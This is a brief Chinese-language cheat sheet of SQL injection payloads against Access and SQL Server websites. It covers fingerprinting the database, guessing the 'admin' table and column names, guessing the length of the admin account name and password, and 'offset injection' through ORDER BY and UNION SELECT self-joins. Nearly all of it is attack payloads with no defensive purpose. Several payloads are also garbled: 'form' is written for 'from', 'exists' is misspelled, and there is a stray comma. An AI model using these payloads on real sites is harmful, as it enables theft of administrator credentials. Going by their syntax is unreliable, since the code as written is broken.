判断数据库注入
and exsits(select * form msysobjects) > 0 判断是否为access数据库
and exsits(select * form sysobjects) > 0 【判断是否为sqlserver
判断数据库表
and exist(select * form admin) 是否存在admin表
判断数据库列名
and exists (select admin form admin) 判断在admin表中是否存在admin列
判断账户密码的长度
and (select len(admin) form admin)=5 如果返回正常说明管理员账户的长度为5
and (select len(password)form admin) = 5 猜解管理账户长度是否为5
order by 用来猜有多少个列
偏移注入
主要是解决猜得到表名,猜不到列名的情况
用*号代替,不断减减减,*代表所有表的字段
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from admin
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,* from admin
以此类推,直到返回正常
带入公式:
最开始的数-这次不报错的数 = 结果 38-22=16
(最开始的数-结果*2) + 结果*2 = 最开始的数
如果(最开始的数-结果*2)里面还包含结果,则结果*3,以此类推,如果还包含,结果*4
所以这次的语句就是
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id, * form (admin as a inner join admin as b on a.id=b.id)
第三次注入的语句
union select 1,2,3,4,a.id,b.id,c.id,form ((admin as a inner join admin as b on a.id=b.id)inner join admin as c on a.id=c.id)